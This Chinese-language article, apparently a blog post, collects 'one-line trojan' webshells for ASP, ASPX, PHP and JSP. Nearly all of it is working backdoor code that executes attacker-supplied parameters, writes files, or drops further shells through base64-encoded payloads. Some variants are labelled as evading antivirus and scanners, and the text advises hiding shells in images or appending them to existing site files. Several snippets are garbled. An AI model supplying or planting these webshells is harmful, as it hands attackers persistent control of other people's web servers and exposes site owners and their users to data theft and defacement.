免责声明:本文仅做技术分享,读者一切非法活动均与作者无关。
什么是一句话木ma
一句话木ma是黑客经常使用的一种后门程序,可以通过一句话的方式在受害者的服务器上执行任意命令,从而获取服务器的控制权。一句话木ma通常使用PHP或ASP等脚本语言编写,可以通过各种方式进行传播,例如通过邮件、社交媒体、网站漏洞等方式进行传播。一句话木ma的危害非常大,可以导致服务器被黑客完全控制,从而泄露敏感信息、破坏网站功能等。
合集
一句话木ma
<%eval request("c")%>
<%execute request("c")%>
<%execute(request("c"))%>
<%ExecuteGlobal request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<%eval(Request.Item["c"],"unsafe");%>
'备份专用
<%eval(request("c")):response.end%>
'无防下载表,有防下载表突破专用一句话
<%execute request("c")%><%<%loop<%:%>
<%<%loop<%:%><%execute request("c")%>
<%execute request("c")<%loop<%:%>
'防杀防扫专用
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
'不用"<,>"
<script language=VBScript runat=server>execute request("c")</script>
<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.
名字)+'') %>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=vbs runat=server>eval_r(request("c"))</script>
'不用双引号
<%eval request(chr(35))%>
'可以躲过雷客图
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject
"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
<%dy=request("dy")%><%Eval(dy)%>
'容错代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
PHP一句话
<?php eval($_POST1);?> <?php if(isset($_POST['c'])){eval($_POST['c']);}?> <?php system($_REQUEST1);?> <?php ($_=@$_GET1).@$_($_POST1)?> <?php eval_r($_POST1)?> <?php @eval_r($_POST1)?>//容错代码 <?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 <?$_POST['c']($_POST['cc']);?> <?$_POST['c']($_POST['cc'],$_POST['cc'])?> <?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O> <?php echo `$_GET['r']` ?> //绕过<?限制的一句话 <script language="php">@eval_r($_POST[sb])</script>
JSP一句话
<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%> 提交客户端 <form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form> ASPX一句话 <script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 再补充几个: 推荐还是把一句话加进图片里面去。 普通的php一句话:<?php @eval($_POST['r00ts']);?> 普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%> aspx突破一流的: [code] dim da set fso=server.createobject("scripting.filesystemobject") path=request("path") if path<>"" then data=request("da") set da=fso.createtextfile(path,true) da.write data if err=0 then Response.Write "yes" else Response.Write "no" end if err.clear end if set da=nothing set fos=nothing Response.Write "<form action=" method=post>" Response.Write "<input type=text name=path>" Response.Write "<br>" Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name")) Response.Write "<br>" Response.Write "操作系统为:"&Request.ServerVariables("OS") Response.Write "<br>" Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE") Response.Write "<br>" Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>" Response.Write "<br>" Response.Write "<input type=submit value=save>" Response.Write "</form>" </Script>
ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>
PHP防杀放扫 一句话:<?php (])?>
上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如
index.asp里面也是可以的!
因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件
的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system
($_REQUEST[1]);?>
无防下载表,有防下载表可尝试插入以下语句突破的一句话
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request
(“class”)%><%execute request(“class”)'<% loop <%:%>
备份专用<%eval(request(“1″)):response.end%>
asp一句话<%execute(request(“1″))%>
aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y
(“add6bb58e139be10″);</script>
可以躲过雷客图的一句话。
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>
不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>
不用双引号的一句话。<%eval request(chr(35))%>
php木ma集合
1、eval.php
<?php @eval($_POST['cmd'])?>
2、assert.php
<?php assert($_POST[cmd]);?>
3、min_lenth.php
<?=`$_GET[1]`;//<?=`*`;
4、get_get.php
<?php //?a=assert&b=phpinfo(); @$_GET[a](@$_GET[b]); //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; ?>
5、get_post.php
<?php //?2=system POST:1=whoami //2=assert 1=phpinfo(); ($_=@$_GET[2]).@$_($_POST[1])//?2=assert 1 ?>
7、request_ab.php
<?php //?a=system&b=dir //?a=assert&b=phpinfo(); //?a=assert&b=eval($_POST['pass']) //POST: // a=assert&b=phpinfo(); // a=system&b=whoami //GET: // http://127.0.0.1/fuckdun/yjh_2.php?a=assert&b=phpinfo(); //phpinfo(); == fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29; //生成 c.php <?php @eval($_POST[c]); $_REQUEST['a']($_REQUEST['b']); ?>
8、document-write.php
<?php $root=$_SERVER['DOCUMENT_ROOT']; $shelladdr=$root.'/shell.php'; $shellcontent='<?php@eval($_POST["cmd"]);?>'; file_put_contents($shelladdr,$shellcontent); //http://127.0.0.1/write_shell.php?cmd=file_put_contents("a.txt","w"); //http://127.0.0.1/write_shell.php?cmd=fwrite(fopen("a.txt","w"),"aa"); //$a = @$_GET['cmd']; //@eval($a); ?>
9、script.php
<script language="php">@eval($_POST['cmd']);</script>
10、include.php
<?php $filename=$_GET['id']; include($filename); ?>
11、require.php
<?php if($_POST['token']=='xxoo'){ require'flag.png';//phpinfo(); }
12、stripslashes.php
<?php $content=stripslashes($_POST[1]); eval($content); ?>
13、config.php
<?php ${"func"}=substr(__FILE__,-10,-4); ${"config"}=@$_GET[config]; @$func($config);
14、$_POST[cmd].php
<?php ${"function"}=substr(__FILE__,-15,-4); ${"config"}=assert; $config($function); //$func = @$_POST[cmd]; //assert($function); //assert($_POST[cmd]);
![BUUCTF-[GUET-CTF2019]re(Reverse逆向)](https://ucc.alicdn.com/wqoym6gdk4gnc/developer-article1645688/20241217/96cd1a90cc1c4783b134fbd522690a2a.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)
